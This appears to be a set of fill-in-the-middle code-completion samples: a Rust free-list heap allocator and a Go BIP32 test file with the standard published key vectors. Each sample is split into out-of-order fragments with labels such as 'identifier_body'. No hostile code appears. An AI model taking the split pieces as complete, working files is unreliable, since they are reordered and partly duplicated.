let min_cell_size: Bytes = policy.min_cell_size(alloc_size).into();
if data + size_of::<CellHeader>().0 + min_cell_size.0 <= split_and_aligned {
let split_cell_head = split_and_aligned - size_of::<CellHeader>().0;
let split_cell = unsafe {
&*FreeCell::from_uninitialized(
unchecked_unwrap(NonNull::new(split_cell_head as *mut u8)),
Bytes(next - split_cell_head) - size_of::<CellHeader>(),
None,
policy,
)
};
Neighbors::append(&self.header, &split_cell.header);
self.clear_next_free_can_merge();
if CellHeader::next_cell_is_invalid(&self.header.neighbors) {
CellHeader::clear_next_cell_is_invalid(&self.header.neighbors);
CellHeader::set_next_cell_is_invalid(&split_cell.header.neighbors);
}
return Some(split_cell.as_allocated_cell(policy));
}
// There isn't enough room to split this cell and still satisfy the
// requested allocation. Because of the early check, we know this cell
// is large enough to fit the requested size, but is the cell's data
// properly aligned?
if self.header.is_aligned_to(align) {
previous.set(self.next_free());
let allocated = self.as_allocated_cell(policy);
return Some(allocated);
}
None
}
fn insert_into_free_list<'b>(
&'b self,
head: &'b Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
) -> &'b Cell<*const FreeCell<'a>> {
self.next_free_raw.set(head.get());
head.set(self);
head
}
}
impl<'a> AllocatedCell<'a> {
unsafe fn as_free_cell(&self, _policy: &dyn AllocPolicy<'a>) -> &FreeCell<'a> {
CellHeader::set_free(&self.header.neighbors);
let free: &FreeCell = &*(self as *const AllocatedCell as *const FreeCell);
free.next_free_raw.set(ptr::null_mut());
free
}
fn data(&self) -> *const u8 {
let cell = &self.header as *const CellHeader;
unsafe { cell.offset(1) as *const u8 }
}
}
trait AllocPolicy<'a> {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr>;
fn min_cell_size(&self, alloc_size: Words) -> Words;
fn should_merge_adjacent_free_cells(&self) -> bool;
}
struct LargeAllocPolicy;
static LARGE_ALLOC_POLICY: LargeAllocPolicy = LargeAllocPolicy;
impl LargeAllocPolicy {
const MIN_CELL_SIZE: Words = Words(size_classes::SizeClasses::NUM_SIZE_CLASSES * 2);
}
impl<'a> AllocPolicy<'a> for LargeAllocPolicy {
unsafe fn new_cell_for_free_list(
&self,
size: Words,
align: Bytes,
) -> Result<*const FreeCell<'a>, AllocErr> {
// To assure that an allocation will always succeed after refilling the
// free list with this new cell, make sure that we allocate enough to
// fulfill the requested alignment, and still have the minimum cell size
// left over.
let size: Bytes = cmp::max(size.into(), (align + Self::MIN_CELL_SIZE) * Words(2));
let pages: Pages = (size + size_of::<CellHeader>()).round_up_to();
let new_pages = imp::alloc_pages(pages)?;
let allocated_size: Bytes = pages.into();
let free_cell = &*FreeCell::from_uninitialized(
new_pages,
allocated_size - size_of::<CellHeader>(),
None,
self as &dyn AllocPolicy<'a>,
);
let next_cell = (new_pages.as_ptr() as *const u8).add(allocated_size.0);
free_cell
.header
.neighbors
.set_next(next_cell as *const CellHeader);
CellHeader::set_next_cell_is_invalid(&free_cell.header.neighbors);
Ok(free_cell)
}
fn min_cell_size(&self, _alloc_size: Words) -> Words {
Self::MIN_CELL_SIZE
}
fn should_merge_adjacent_free_cells(&self) -> bool {
true
}
}
#[inline]
unsafe fn unchecked_unwrap<T>(o: Option<T>) -> T {
match o {
Some(t) => t,
None => core::hint::unreachable_unchecked(),
}
}
unsafe fn walk_free_list<'a, F, T>(
head: &Cell<*const FreeCell<'a>>,
_policy: &dyn AllocPolicy<'a>,
mut f: F,
) -> Result<T, AllocErr>
where
F: FnMut(&Cell<*const FreeCell<'a>>, &FreeCell<'a>) -> Option<T>,
{
// The previous cell in the free list (not to be confused with the current
// cell's previously _adjacent_ cell).
let previous_free = head;
loop {
let current_free = previous_free.get();
if current_free.is_null() {
return Err(AllocErr);
}
let current_free = Cell::new(current_free);
// Now check if this cell can merge with the next cell in the free
// list.
//
// We don't re-check `policy.should_merge_adjacent_free_cells()` because
// the `NEXT_FREE_CELL_CAN_MERGE` bit only gets set after checking with
// the policy.
while (*current_free.get()).next_free_can_merge() {
let current = &*current_free.get();
current.clear_next_free_can_merge();
let prev_neighbor = unchecked_unwrap(
current
.header
.neighbors
.prev()
.and_then(|p| p.as_free_cell()),
);
current.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(¤t.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev_neighbor.header.neighbors);
}
previous_free.set(prev_neighbor);
current_free.set(prev_neighbor);
}
if let Some(result) = f(previous_free, &*current_free.get()) {
return Ok(result);
}
previous_free.set(&*(*current_free.get()).next_free_raw.get());
}
}
/// Do a first-fit allocation from the given free list.
unsafe fn alloc_first_fit<'a>(
size: Words,
align: Bytes,
head: &Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
walk_free_list(head, policy, |previous, current| {
if let Some(allocated) = current.try_alloc(previous, size, align, policy) {
return Some(unchecked_unwrap(NonNull::new(allocated.data() as *mut u8)));
}
None
})
}
unsafe fn alloc_with_refill<'a, 'b>(
size: Words,
align: Bytes,
head: &'b Cell<*const FreeCell<'a>>,
policy: &dyn AllocPolicy<'a>,
) -> Result<NonNull<u8>, AllocErr> {
if let Ok(result) = alloc_first_fit(size, align, head, policy) {
return Ok(result);
}
let cell = policy.new_cell_for_free_list(size, align)?;
let head = (*cell).insert_into_free_list(head, policy);
alloc_first_fit(size, align, head, policy)
}
/// An N64 allocator.
///
/// # Safety
///
/// When used in unix environments, it cannot be moved in memory. Typically not an
/// issue if you're just using this as a `static` global allocator.
pub struct N64Alloc<'a> {
head: imp::Exclusive<*const FreeCell<'a>>,
size_classes: size_classes::SizeClasses<'a>,
}
unsafe impl<'a> Sync for N64Alloc<'a> {}
impl<'a> ConstInit for N64Alloc<'a> {
const INIT: N64Alloc<'a> = N64Alloc {
head: imp::Exclusive::INIT,
size_classes: size_classes::SizeClasses::INIT,
};
}
impl<'a> N64Alloc<'a> {
/// An initial `const` default construction of a `N64Alloc` allocator.
///
/// This is usable for initializing `static`s that get set as the global
/// allocator.
pub const INIT: Self = <Self as ConstInit>::INIT;
unsafe fn with_free_list_and_policy_for_size<F, T>(&self, size: Words, align: Bytes, f: F) -> T
where
F: for<'b> FnOnce(&'b Cell<*const FreeCell<'a>>, &'b dyn AllocPolicy<'a>) -> T,
|
unsafe fn alloc_impl(&self, layout: Layout) -> Result<NonNull<u8>, AllocErr> {
let size = Bytes(layout.size());
let align = if layout.align() == 0 {
Bytes(1)
} else {
Bytes(layout.align())
};
if size.0 == 0 {
// Ensure that our made up pointer is properly aligned by using the
// alignment as the pointer.
return Ok(NonNull::new_unchecked(align.0 as *mut u8));
}
let word_size: Words = checked_round_up_to(size).ok_or(AllocErr)?;
self.with_free_list_and_policy_for_size(word_size, align, |head, policy| {
alloc_with_refill(word_size, align, head, policy)
})
}
unsafe fn dealloc_impl(&self, ptr: NonNull<u8>, layout: Layout) {
let size = Bytes(layout.size());
if size.0 == 0 {
return;
}
let size: Words = size.round_up_to();
let align = Bytes(layout.align());
self.with_free_list_and_policy_for_size(size, align, |head, policy| {
let cell = (ptr.as_ptr() as *mut CellHeader<'a> as *const CellHeader<'a>).offset(-1);
let cell = &*cell;
let cell: &AllocatedCell<'a> = &*(cell as *const CellHeader as *const AllocatedCell);
let free = cell.as_free_cell(policy);
if policy.should_merge_adjacent_free_cells() {
// Merging with the _previous_ adjacent cell is easy: it is
// already in the free list, so folding this cell into it is all
// that needs to be done. The free list can be left alone.
//
// Merging with the _next_ adjacent cell is a little harder. It
// is already in the free list, but we need to splice it out
// from the free list, since its header will become invalid
// after consolidation, and it is *this* cell's header that
// needs to be in the free list. But we don't have access to the
// pointer pointing to the soon-to-be-invalid header, and
// therefore can't adjust that pointer. So we have a delayed
// consolidation scheme. We insert this cell just after the next
// adjacent cell in the free list, and set the next adjacent
// cell's `NEXT_FREE_CAN_MERGE` bit. The next time that we walk
// the free list for allocation, the bit will be checked and the
// consolidation will happen at that time.
//
// If _both_ the previous and next adjacent cells are free, we
// are faced with a dilemma. We cannot merge all previous,
// current, and next cells together because our singly-linked
// free list doesn't allow for that kind of arbitrary appending
// and splicing. There are a few different kinds of tricks we
// could pull here, but they would increase implementation
// complexity and code size. Instead, we use a heuristic to
// choose whether to merge with the previous or next adjacent
// cell. We could choose to merge with whichever neighbor cell
// is smaller or larger, but we don't. We prefer the previous
// adjacent cell because we can greedily consolidate with it
                // immediately, whereas consolidating with the next adjacent
// cell must be delayed, as explained above.
if let Some(prev) = free
.header
.neighbors
.prev()
.and_then(|p| (*p).as_free_cell())
{
free.header.neighbors.remove();
if CellHeader::next_cell_is_invalid(&free.header.neighbors) {
CellHeader::set_next_cell_is_invalid(&prev.header.neighbors);
}
return;
}
if let Some(next) = free
.header
.neighbors
.next()
.and_then(|n| (*n).as_free_cell())
{
free.next_free_raw.set(next.next_free());
next.next_free_raw.set(free);
next.set_next_free_can_merge();
return;
}
}
// Either we don't want to merge cells for the current policy, or we
// didn't have the opportunity to do any merging with our adjacent
// neighbors. In either case, push this cell onto the front of the
// free list.
let _head = free.insert_into_free_list(head, policy);
});
}
}
pub static ALLOC_BYTES_LEFT: AtomicI32 = AtomicI32::new(imp::SCRATCH_LEN_BYTES as i32);
pub static ALLOC_BYTES_USED: AtomicI32 = AtomicI32::new(0);
pub use imp::OFFSET as ALLOC_PAGE_OFFSET;
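// Illustrative sketch (not part of the original crate): the two counters above
// can be polled at runtime to watch heap pressure. Because `alloc` subtracts
// from one and adds to the other (and `dealloc` does the reverse), their sum
// stays at `imp::SCRATCH_LEN_BYTES`.
//
//     use core::sync::atomic::Ordering;
//     let left = ALLOC_BYTES_LEFT.load(Ordering::SeqCst);
//     let used = ALLOC_BYTES_USED.load(Ordering::SeqCst);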
unsafe impl GlobalAlloc for N64Alloc<'static> {
unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
ALLOC_BYTES_LEFT.fetch_sub(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_add(layout.size() as i32, Ordering::SeqCst);
match self.alloc_impl(layout) {
Ok(ptr) => ptr.as_ptr(),
Err(AllocErr) => ptr::null_mut(),
}
}
unsafe fn dealloc(&self, ptr: *mut u8, layout: Layout) {
ALLOC_BYTES_LEFT.fetch_add(layout.size() as i32, Ordering::SeqCst);
ALLOC_BYTES_USED.fetch_sub(layout.size() as i32, Ordering::SeqCst);
if let Some(ptr) = NonNull::new(ptr) {
self.dealloc_impl(ptr, layout);
}
}
}
| {
if align <= size_of::<usize>() {
if let Some(head) = self.size_classes.get(size) {
let policy = size_classes::SizeClassAllocPolicy(&self.head);
let policy = &policy as &dyn AllocPolicy<'a>;
return head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
});
}
}
let policy = &LARGE_ALLOC_POLICY as &dyn AllocPolicy<'a>;
self.head.with_exclusive_access(|head| {
let head_cell = Cell::new(*head);
let result = f(&head_cell, policy);
*head = head_cell.get();
result
})
} | identifier_body |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
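// Note (added for clarity): a pathFragment at or above FirstHardenedChild
// denotes a hardened child, written with a trailing apostrophe in BIP32 path
// notation, e.g. FirstHardenedChild + 44 corresponds to 44'.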
func TestBip32TestVectors(t *testing.T) {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
privKey: "xprvA2JDeKCSNNZky6uBCviVfJSKyQ1mDYahRjijr5idH2WwLsEd4Hsb2Tyh8RfQMuPh7f7RtyzTtdrbdqqsunu5Mm3wDvUAKRHSC34sJ7in334",
pubKey: "xpub6FHa3pjLCk84BayeJxFW2SP4XRrFd1JYnxeLeU8EqN3vDfZmbqBqaGJAyiLjTAwm6ZLRQUMv1ZACTj37sR62cfN7fe5JnJ7dh8zL4fiyLHV",
},
{
pathFragment: 1000000000,
privKey: "xprvA41z7zogVVwxVSgdKUHDy1SKmdb533PjDz7J6N6mV6uS3ze1ai8FHa8kmHScGpWmj4WggLyQjgPie1rFSruoUihUZREPSL39UNdE3BBDu76",
pubKey: "xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy",
},
},
}
vector2 := testMasterKey{
seed: "fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542",
privKey: "xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U",
pubKey: "xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB",
children: []testChildKey{
{
pathFragment: 0,
privKey: "xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt",
pubKey: "xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH",
},
{
pathFragment: 2147483647 + hStart,
privKey: "xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9",
pubKey: "xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a",
},
{
pathFragment: 1, | pathFragment: 2147483646 + hStart,
privKey: "xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc",
pubKey: "xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL",
},
{
pathFragment: 2,
privKey: "xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j",
pubKey: "xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt",
},
},
}
vector3 := testMasterKey{
seed: "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be",
privKey: "xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6",
pubKey: "xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13",
children: []testChildKey{
{
pathFragment: hStart + 0,
privKey: "xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L",
pubKey: "xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y",
},
},
}
testVectorKeyPairs(t, vector1)
testVectorKeyPairs(t, vector2)
testVectorKeyPairs(t, vector3)
}
func testVectorKeyPairs(t *testing.T, vector testMasterKey) {
	// Decode the hex-encoded master seed into bytes
seed, _ := hex.DecodeString(vector.seed)
// Generate a master private and public key
privKey, err := NewMasterKey(seed)
assert.NoError(t, err)
pubKey := privKey.PublicKey()
assert.Equal(t, vector.privKey, privKey.String())
assert.Equal(t, vector.pubKey, pubKey.String())
// Iterate over the entire child chain and test the given keys
for _, testChildKey := range vector.children {
// Get the private key at the given key tree path
privKey, err = privKey.NewChildKey(testChildKey.pathFragment)
assert.NoError(t, err)
// Get this private key's public key
pubKey = privKey.PublicKey()
// Assert correctness
assert.Equal(t, testChildKey.privKey, privKey.String())
assert.Equal(t, testChildKey.pubKey, pubKey.String())
// Serialize and deserialize both keys and ensure they're the same
assertKeySerialization(t, privKey, testChildKey.privKey)
assertKeySerialization(t, pubKey, testChildKey.pubKey)
}
}
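// exampleDerivePath is an illustrative sketch (not part of the original test
// suite) showing how a path such as m/44'/60'/0'/0 is derived one fragment at
// a time with NewChildKey. It only uses identifiers that already appear in
// this file (Key, NewMasterKey, NewChildKey, FirstHardenedChild).
func exampleDerivePath(seed []byte) (*Key, error) {
	// Start from the master key at the root of the tree ("m").
	key, err := NewMasterKey(seed)
	if err != nil {
		return nil, err
	}
	// Hardened fragments are offset by FirstHardenedChild (written with a ').
	for _, fragment := range []uint32{
		FirstHardenedChild + 44, // 44'
		FirstHardenedChild + 60, // 60'
		FirstHardenedChild + 0,  // 0'
		0,                       // 0
	} {
		key, err = key.NewChildKey(fragment)
		if err != nil {
			return nil, err
		}
	}
	return key, nil
}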
func TestPublicParentPublicChildDerivation(t *testing.T) {
// Generated using https://iancoleman.github.io/bip39/
// Root key:
// xprv9s21ZrQH143K2Cfj4mDZBcEecBmJmawReGwwoAou2zZzG45bM6cFPJSvobVTCB55L6Ld2y8RzC61CpvadeAnhws3CHsMFhNjozBKGNgucYm
// Derivation Path m/44'/60'/0'/0:
// xprv9zy5o7z1GMmYdaeQdmabWFhUf52Ytbpe3G5hduA4SghboqWe7aDGWseN8BJy1GU72wPjkCbBE1hvbXYqpCecAYdaivxjNnBoSNxwYD4wHpW
// xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u
extendedMasterPublic, err := B58Deserialize(
"xpub6DxSCdWu6jKqr4isjo7bsPeDD6s3J4YVQV1JSHZg12Eagdqnf7XX4fxqyW2sLhUoFWutL7tAELU2LiGZrEXtjVbvYptvTX5Eoa4Mamdjm9u",
DefaultBip32Version)
assert.NoError(t, err)
expectedChildren := []testChildKey{
{pathFragment: 0, hexPubKey: "0243187e1a2ba9ba824f5f81090650c8f4faa82b7baf93060d10b81f4b705afd46"},
{pathFragment: 1, hexPubKey: "023790d11eb715c4320d8e31fba3a09b700051dc2cdbcce03f44b11c274d1e220b"},
{pathFragment: 2, hexPubKey: "0302c5749c3c75cea234878ae3f4d8f65b75d584bcd7ed0943b016d6f6b59a2bad"},
{pathFragment: 3, hexPubKey: "03f0440c94e5b14ea5b15875934597afff541bec287c6e65dc1102cafc07f69699"},
{pathFragment: 4, hexPubKey: "026419d0d8996707605508ac44c5871edc7fe206a79ef615b74f2eea09c5852e2b"},
{pathFragment: 5, hexPubKey: "02f63c6f195eea98bdb163c4a094260dea71d264b21234bed4df3899236e6c2298"},
{pathFragment: 6, hexPubKey: "02d74709cd522081064858f393d009ead5a0ecd43ede3a1f57befcc942025cb5f9"},
{pathFragment: 7, hexPubKey: "03e54bb92630c943d38bbd8a4a2e65fca7605e672d30a0e545a7198cbb60729ceb"},
{pathFragment: 8, hexPubKey: "027e9d5acd14d39c4938697fba388cd2e8f31fc1c5dc02fafb93a10a280de85199"},
{pathFragment: 9, hexPubKey: "02a167a9f0d57468fb6abf2f3f7967e2cadf574314753a06a9ef29bc76c54638d2"},
{pathFragment: 100, hexPubKey: "020db9ba00ddf68428e3f5bfe54252bbcd75b21e42f51bf3bfc4172bf0e5fa7905"},
{pathFragment: 101, hexPubKey: "0299e3790956570737d6164e6fcda5a3daa304065ca95ba46bc73d436b84f34d46"},
{pathFragment: 102, hexPubKey: "0202e0732c4c5d2b1036af173640e01957998cfd4f9cdaefab6ffe76eb869e2c59"},
{pathFragment: 103, hexPubKey: "03d050adbd996c0c5d737ff638402dfbb8c08e451fef10e6d62fb57887c1ac6cb2"},
{pathFragment: 104, hexPubKey: "038d466399e2d68b4b16043ad4d88893b3b2f84fc443368729a973df1e66f4f530"},
{pathFragment: 105, hexPubKey: "034811e2f0c8c50440c08c2c9799b99c911c036e877e8325386ff61723ae3ffdce"},
{pathFragment: 106, hexPubKey: "026339fd5842921888e711a6ba9104a5f0c94cc0569855273cf5faefdfbcd3cc29"},
{pathFragment: 107, hexPubKey: "02833705c1069fab2aa92c6b0dac27807290d72e9f52378d493ac44849ca003b22"},
{pathFragment: 108, hexPubKey: "032d2639bde1eb7bdf8444bd4f6cc26a9d1bdecd8ea15fac3b992c3da68d9d1df5"},
{pathFragment: 109, hexPubKey: "02479c6d4a64b93a2f4343aa862c938fbc658c99219dd7bebb4830307cbd76c9e9"},
}
for _, child := range expectedChildren {
pubKey, err := extendedMasterPublic.NewChildKey(child.pathFragment)
assert.NoError(t, err)
assert.False(t, pubKey.IsPrivate)
assert.Equal(t, child.hexPubKey, hex.EncodeToString(pubKey.Key))
}
}
func TestNewSeed(t *testing.T) {
for i := 0; i < 20; i++ {
seed, err := NewSeed()
assert.NoError(t, err)
assert.Equal(t, 256, len(seed))
}
}
func TestB58SerializeUnserialize(t *testing.T) {
tests := []struct {
seed []byte
base58 string
}{
{[]byte{}, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsMC"},
{[]byte{1}, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEC"},
{[]byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 0}, "xprv9s21ZrQH143K2hKT3jMKPFEcQLbx2XD55NtqQA7B4C5U9mTZY7gBeCdoFgurN4pxkQshzP8AQhBmUNgAo5djj5FzvUFh5pKH6wcRMSXVuc1"},
}
for _, test := range tests {
key, err := NewMasterKey(test.seed)
assert.NoError(t, err)
assertKeySerialization(t, key, test.base58)
}
}
func TestDeserializingInvalidStrings(t *testing.T) {
tests := []struct {
err error
base58 string
}{
{ErrSerializedKeyWrongSize, "xprv9s21ZrQH143K4YUcKrp6cVxQaX59ZFkN6MFdeZjt8CHVYNs55xxQSvZpHWfojWMv6zgjmzopCyWPSFAnV4RU33J4pwCcnhsB4R4mPEnTsM"},
{ErrInvalidChecksum, "xprv9s21ZrQH143K3YSbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc"},
}
for _, test := range tests {
_, err := B58Deserialize(test.base58, DefaultBip32Version)
assert.Equal(t, test.err, err)
}
_, err := B58Deserialize("notbase58iiiiiIIIIIbAXLMPCzJso5QAarQksAGc5rQCyZCBfw4Rj2PqVLFNgezSBhktYkiL3Ta2stLPDF9yZtLMaxk6Spiqh3DNFG8p8MVeEc",
DefaultBip32Version)
assert.NotNil(t, err)
}
func TestCantCreateHardenedPublicChild(t *testing.T) {
key, err := NewMasterKey([]byte{})
assert.NoError(t, err)
// Test that it works for private keys
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.NoError(t, err)
// Test that it throws an error for public keys if hardened
key = key.PublicKey()
_, err = key.NewChildKey(FirstHardenedChild - 1)
assert.NoError(t, err)
_, err = key.NewChildKey(FirstHardenedChild)
assert.Equal(t, ErrHardnedChildPublicKey, err)
_, err = key.NewChildKey(FirstHardenedChild + 1)
assert.Equal(t, ErrHardnedChildPublicKey, err)
}
func assertKeySerialization(t *testing.T, key *Key, knownBase58 string) {
serializedBase58 := key.B58Serialize()
assert.Equal(t, knownBase58, serializedBase58)
unserializedBase58, err := B58Deserialize(serializedBase58, DefaultBip32Version)
assert.NoError(t, err)
assert.Equal(t, key, unserializedBase58)
} | privKey: "xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef",
pubKey: "xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon",
},
{ | random_line_split |
bip32_test.go | package bip32
import (
"encoding/hex"
"testing"
"github.com/stretchr/testify/assert"
)
type testMasterKey struct {
seed string
children []testChildKey
privKey string
pubKey string
}
type testChildKey struct {
pathFragment uint32
privKey string
pubKey string
hexPubKey string
}
func TestBip32TestVectors(t *testing.T) {
hStart := FirstHardenedChild
vector1 := testMasterKey{
seed: "000102030405060708090a0b0c0d0e0f",
privKey: "xprv9s21ZrQH143K3QTDL4LXw2F7HEK3wJUD2nW2nRk4stbPy6cq3jPPqjiChkVvvNKmPGJxWUtg6LnF5kejMRNNU3TGtRBeJgk33yuGBxrMPHi",
pubKey: "xpub661MyMwAqRbcFtXgS5sYJABqqG9YLmC4Q1Rdap9gSE8NqtwybGhePY2gZ29ESFjqJoCu1Rupje8YtGqsefD265TMg7usUDFdp6W1EGMcet8",
children: []testChildKey{
{
pathFragment: hStart,
privKey: "xprv9uHRZZhk6KAJC1avXpDAp4MDc3sQKNxDiPvvkX8Br5ngLNv1TxvUxt4cV1rGL5hj6KCesnDYUhd7oWgT11eZG7XnxHrnYeSvkzY7d2bhkJ7",
pubKey: "xpub68Gmy5EdvgibQVfPdqkBBCHxA5htiqg55crXYuXoQRKfDBFA1WEjWgP6LHhwBZeNK1VTsfTFUHCdrfp1bgwQ9xv5ski8PX9rL2dZXvgGDnw",
},
{
pathFragment: 1,
privKey: "xprv9wTYmMFdV23N2TdNG573QoEsfRrWKQgWeibmLntzniatZvR9BmLnvSxqu53Kw1UmYPxLgboyZQaXwTCg8MSY3H2EU4pWcQDnRnrVA1xe8fs",
pubKey: "xpub6ASuArnXKPbfEwhqN6e3mwBcDTgzisQN1wXN9BJcM47sSikHjJf3UFHKkNAWbWMiGj7Wf5uMash7SyYq527Hqck2AxYysAA7xmALppuCkwQ",
},
{
pathFragment: 2 + hStart,
privKey: "xprv9z4pot5VBttmtdRTWfWQmoH1taj2axGVzFqSb8C9xaxKymcFzXBDptWmT7FwuEzG3ryjH4ktypQSAewRiNMjANTtpgP4mLTj34bhnZX7UiM",
pubKey: "xpub6D4BDPcP2GT577Vvch3R8wDkScZWzQzMMUm3PWbmWvVJrZwQY4VUNgqFJPMM3No2dFDFGTsxxpG5uJh7n7epu4trkrX7x7DogT5Uv6fcLW5",
},
{
pathFragment: 2,
